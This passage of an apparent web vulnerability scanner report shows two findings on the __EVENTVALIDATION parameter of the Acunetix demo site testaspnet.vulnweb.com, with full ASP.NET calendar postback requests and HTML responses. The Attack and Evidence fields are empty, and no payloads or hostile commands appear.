vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8360&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBASlVTy9oIZGRka1qQj%2FNNU%2Bb4cVU7dv2GoPFrjrA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKOw8XmCQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA3VJTcB32vjU%2BxmC%2Bl%2BAZ9dZwtrz
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:40:49 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBASlVTy9oIZGRka1qQj/NNU+b4cVU7dv2GoPFrjrA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKOw8XmCQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA3VJTcB32vjU+xmC+l+AZ9dZwtrz" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:White" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8373&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAACpfIrV2ghkZGRlEIKc0yrfIgcDIdzHvIeaD3Cuxg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKP0umvCgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDhR%2BotDHhbB%2B1jjhbWn3GID6jFa
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:46 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAACpfIrV2ghkZGRlEIKc0yrfIgcDIdzHvIeaD3Cuxg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP0umvCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDhR+otDHhbB+1jjhbWn3GID6jFa" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:White" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
